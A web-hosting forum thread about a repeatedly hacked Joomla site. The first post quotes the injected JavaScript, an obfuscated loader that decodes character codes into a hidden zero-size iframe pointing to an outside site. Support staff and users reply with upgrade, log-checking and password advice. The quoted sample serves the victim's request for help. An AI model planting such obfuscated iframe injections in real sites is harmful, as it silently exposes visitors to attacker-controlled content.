Joomla Attack

apps

#1

Hi there…
I have some problem with attack in my blog.

I dont how… but everytime the guys put a js file in my files.
Please I need help.

The .js they pu in my website… is this:
function Decode()
{
var temp="",i,c=0,out="";var str=“60!105!102!114!97!109!101!32!115!114!99!61”;
str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
while(str.charAt©!=’!’)temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}
document.write(out);
}
Decode();


#2

What version of Joomla! are you running and what version of PHP are you running your Joomla! installation on?

–rlparker
–DreamHost Tech Support


#3

EDIT
I opened this thread and waited for a while before responding. RLParker beat me to it…
EDIT


#4

Ouch… http://forum.joomlaworks.gr/index.php?topic=5212.msg18909;topicseen

Maximum Cash Discount on any plan with MAXCASH


#5

As you have not yet answered regarding your Joomla! version number, a couple of things might be helpful to you in curtailing what is happening on your site:

  1. The plugin_jw_allvideos has been superseded by the greatly improved AllVideos Reloaded script which replaces the gz_eolas_fix.js file altogether with better code for handling the eolas issue:

“Instead of using individually handcrafted JavaScript code in companion with the eolas, the plugin now uses swfobject 2.0 for embedding the player into the page. External video-sites have been cleaned up and adapted to external changes.” (from the extension documentation)

  1. The new extension is Joomla 1.5 Native compatible - there is no reason to run in Joomla! 1.5 in legacy mode or to run an older 1.0.x version of Joomla! just to have this video embedding capability.

  2. If you are running any version of Joomla! 1.0.x older than 1.0.15, you should upgrade immediately to at least version 1.0.15 as there are known security vulnerabilities in all the older versions.

–rlparker
–DreamHost Tech Support


#6

Hey…

I’m using the 1.0.15 version of Joomla.
(http://forum.joomlaworks.gr/index.php?topic=5212.msg18909;topicseen)
The link that you send to me see, was me there. Is the same doubt here.
But now I know the isnt with that mambot (all videos plugin), because the last time my index.php was changed.

I turn off my website, because all the days the guys hacked my website.

Look the anwser:
“Are you hosting your website on Dreamhost? I’m asking that because I found a lot of infected webs on DH, and I want to know if this is a massive attack or something else.”

I search in the log files, but I dont found nothing where they get this attack.


#7

The first step is to update everything, including all plugins.

Maximum Cash Discount on any plan with MAXCASH


#8

At least that I know its everything its updated in my site.


#9

All that means is that however they are getting in, they are changing different things at different visits. This is normal.

If you find no trace of the “attack” in your access, or error, logs then:

  1. You are either not recognizing it when you see it

  2. It’s likely not a compromised script at all, but very likely someone with your password(s).

Irrespective of what the poster at the other forum might be wondering there has been no “massive attack”. Now, I too have “found a lot of infected webs” on every host - primarily the result of people running old, unpatched software that is known to be vulnerable. The WordPress bloggers who can’t be bothered to upgrade are far and above the best example of this in the past couple of years.

–rlparker
–DreamHost Tech Support


#10

I currently have Joomla 1.5 on several of the domains and never had any attacks here on DH. But I do setup the permission(chmod) and using the .htaccess file. One of my sites now been running Joomla/mambo now for 3 years.

Have you looked at the log files on your domain that has been getting attacked? I do telnet in every once in a while and review mine. But I know my sites don’t have a lot of traffic.

-NM